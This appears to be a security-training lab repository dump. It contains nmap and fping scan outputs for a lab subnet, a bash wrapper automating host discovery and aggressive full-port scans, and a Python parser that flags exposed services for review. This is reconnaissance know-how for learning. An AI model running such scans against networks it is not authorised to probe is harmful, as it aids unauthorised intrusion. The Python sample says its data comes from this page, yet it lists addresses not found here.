ine-labs/scanning-and-os-fingerprinting/fping_scan.txt ================================================ 10.142.111.1 10.142.111.6 10.142.111.48 10.142.111.96 10.142.111.99 10.142.111.100 10.142.111.240 ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_ping_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:20:54 2021 as: nmap -sn -oN nmap_ping_scan.txt 10.142.111.* Nmap scan report for 10.142.111.1 Host is up (0.056s latency). Nmap scan report for 10.142.111.6 Host is up (0.057s latency). Nmap scan report for 10.142.111.48 Host is up (0.057s latency). Nmap scan report for 10.142.111.96 Host is up (0.056s latency). Nmap scan report for 10.142.111.99 Host is up (0.056s latency). 
Nmap scan report for 10.142.111.100 Host is up (0.056s latency). Nmap scan report for 10.142.111.213 Host is up (0.060s latency). Nmap scan report for 10.142.111.240 Host is up (0.024s latency). # Nmap done at Wed Feb 17 22:20:57 2021 -- 256 IP addresses (8 hosts up) scanned in 3.23 seconds ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_syn_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:22:53 2021 as: nmap -sS -iL fping_scan.txt -oN nmap_syn_scan.txt Nmap scan report for 10.142.111.1 Host is up (0.057s latency). Not shown: 997 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http MAC Address: 00:50:56:A0:23:42 (VMware) Nmap scan report for 10.142.111.6 Host is up (0.055s latency). Not shown: 999 closed ports PORT STATE SERVICE 22/tcp open ssh MAC Address: 00:50:56:A0:B1:71 (VMware) Nmap scan report for 10.142.111.48 Host is up (0.056s latency). Not shown: 996 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address: 00:50:56:A0:57:E5 (VMware) Nmap scan report for 10.142.111.96 Host is up (0.057s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http MAC Address: 00:50:56:A0:1C:4F (VMware) Nmap scan report for 10.142.111.99 Host is up (0.063s latency). Not shown: 997 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http MAC Address: 00:50:56:A0:E5:3E (VMware) Nmap scan report for 10.142.111.100 Host is up (0.056s latency). All 1000 scanned ports on 10.142.111.100 are closed MAC Address: 00:50:56:A0:1C:4F (VMware) Nmap scan report for 10.142.111.240 Host is up (0.000020s latency). 
All 1000 scanned ports on 10.142.111.240 are closed # Nmap done at Wed Feb 17 22:23:07 2021 -- 7 IP addresses (7 hosts up) scanned in 14.32 seconds ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_version_and_os.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:24:04 2021 as: nmap -O -sV -iL fping_scan.txt -oN nmap_version_and_os.txt Nmap scan report for 10.142.111.1 Host is up (0.055s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0) 53/tcp open domain dnsmasq 2.55 80/tcp open http lighttpd 1.4.29 MAC Address: 00:50:56:A0:23:42 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized|media device Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), FreeBSD 7.X|9.X (87%), Comau embedded (86%), Apple Apple TV 5.X (85%) OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1 Aggressive OS guesses: OpenBSD 4.3 (94%), FreeBSD 7.0-RELEASE (87%), Comau C4G robot control unit (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.1 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Nmap scan report for 10.142.111.6 Host is up (0.054s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) MAC Address: 00:50:56:A0:27:7E (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=22%CT=1%CU=39056%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6 OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 10.142.111.48 Host is up (0.056s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services MAC Address: 00:50:56:A0:57:E5 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=135%CT=1%CU=39985%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%CI=I%II=I OS:%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4= OS:M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%W OS:3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC= OS:N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S OS:%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS OS:%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W= OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T OS:7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN= OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z) Network Distance: 1 hop Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Nmap scan report for 10.142.111.96 Host is up (0.055s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Debian)) MAC Address: 00:50:56:A0:1C:4F (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=80%CT=1%CU=40537%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6 OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Nmap scan report for 10.142.111.99 Host is up (0.056s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0) 53/tcp open domain dnsmasq 2.55 80/tcp open http lighttpd 1.4.29 MAC Address: 00:50:56:A0:E5:3E (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized|media device Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), Comau embedded (86%), FreeBSD 7.X|9.X (86%), Apple Apple TV 5.X (85%) OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1 Aggressive OS guesses: OpenBSD 4.3 (94%), Comau C4G robot control unit (86%), FreeBSD 7.0-RELEASE (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Nmap scan report for 10.142.111.100 Host is up (0.055s latency). 
All 1000 scanned ports on 10.142.111.100 are closed
MAC Address: 00:50:56:A0:1C:4F (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Nmap scan report for 10.142.111.240
Host is up (0.000058s latency).
All 1000 scanned ports on 10.142.111.240 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 22:24:38 2021 -- 7 IP addresses (7 hosts up) scanned in 35.93 seconds

================================================
FILE: scripts/eEnum.sh
================================================
#!/bin/bash
# A wrapper for fping and nmap to help automate the host enumeration.

TARGET=$1
HOST_FILE="alive_hosts.txt"
OUT_FILE="nmap_scan.txt"

print_usage() {
    echo "Usage: $0 "
}

scan() {
    echo "++ starting fping scan ++"
    # Quote every expansion so the target and file names are passed as
    # single arguments and are not word-split or glob-expanded.
    fping -a -g "$TARGET" 2>/dev/null | tee "$HOST_FILE"
    echo ""
    echo "++ starting nmap scan ++"
    sudo nmap -p- -A -T4 -iL "$HOST_FILE" -oN "$OUT_FILE"
}

if [ -z "$TARGET" ]; then
    print_usage
    exit 1
fi

scan
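
The wrapper above leaves its results in nmap_scan.txt in nmap's normal (-oN) layout. As an added example (not part of this repository), the Python below parses a report in that layout into a per-host port inventory and flags open listeners against a review list. The `REVIEW_PORTS` policy, the function names and the embedded sample (lines reproduced from scans on this page) are assumptions made for the illustration.

```python
import re
from dataclasses import dataclass, field

# Sample input embedded so the example runs offline; the lines are taken from
# the -sV reports shown on this page and joined into one constructed report.
SAMPLE_REPORT = """\
# Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 10.104.11.50
Host is up (0.00026s latency).
All 1000 scanned ports on 10.104.11.50 are closed

Nmap scan report for 10.104.11.96
Host is up (0.058s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1

Nmap scan report for 192.168.99.162
Host is up (0.058s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
"""

# Assumed review policy (not from the page): listeners that normally should
# not be reachable from a general user segment.
REVIEW_PORTS = {
    21: "FTP sends credentials in cleartext",
    139: "NetBIOS session service exposed",
    445: "SMB exposed",
    3306: "database listener exposed",
    3389: "remote desktop exposed",
}

# Matches "Nmap scan report for 10.0.0.1" and "... for name (10.0.0.1)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
# Matches a port table row: "22/tcp open ssh OpenSSH 6.0p1 ...".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class Host:
    address: str
    ports: list = field(default_factory=list)


def parse_report(text):
    """Return a list of Host objects, one per 'Nmap scan report for' block.

    Normal output is meant for people; for production tooling prefer nmap's
    XML output (-oX). Hosts whose ports are all closed are kept with an
    empty port list so they still appear in the inventory.
    """
    hosts = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        match = HOST_RE.match(line)
        if match:
            current = Host(match.group(1))
            hosts.append(current)
            continue
        match = PORT_RE.match(line)
        if match and current is not None:
            number, proto, state, service, version = match.groups()
            current.ports.append(
                Port(int(number), proto, state, service, version.strip())
            )
    return hosts


def review(hosts, policy=REVIEW_PORTS):
    """Return (address, port, service, reason) for open ports named in policy."""
    findings = []
    for host in hosts:
        for port in host.ports:
            if port.state == "open" and port.number in policy:
                findings.append(
                    (host.address, port.number, port.service, policy[port.number])
                )
    return findings


if __name__ == "__main__":
    inventory = parse_report(SAMPLE_REPORT)
    for host in inventory:
        listing = ", ".join(f"{p.number}/{p.proto} {p.service}" for p in host.ports)
        print(f"{host.address}: {listing or 'no open ports reported'}")
    for address, number, service, reason in review(inventory):
        print(f"REVIEW {address}:{number} ({service}): {reason}")
```
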